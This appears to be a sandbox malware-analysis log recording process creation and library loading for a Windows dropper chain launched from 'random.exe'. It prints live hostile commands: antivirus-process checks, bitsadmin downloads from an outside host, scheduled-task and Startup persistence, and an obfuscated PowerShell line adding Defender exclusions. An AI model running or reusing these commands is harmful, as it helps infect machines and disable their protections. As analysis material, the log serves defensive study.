Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10141511121\EDM8nAR.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fltMC.exe fltmc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com" "C:\Users\user\AppData\Local\EduGenius Studios Co\u"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe"
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10131261121\EDM8nAR.cmd"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe "C:\Users\user~1\AppData\Local\Temp\10141220101\ReK7Ewx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10141511121\EDM8nAR.cmd"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fltMC.exe fltmc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fltMC.exe fltmc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com" "C:\Users\user\AppData\Local\EduGenius Studios Co\u"
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fltMC.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fltMC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: ntmarta.dll	Jump to behavior
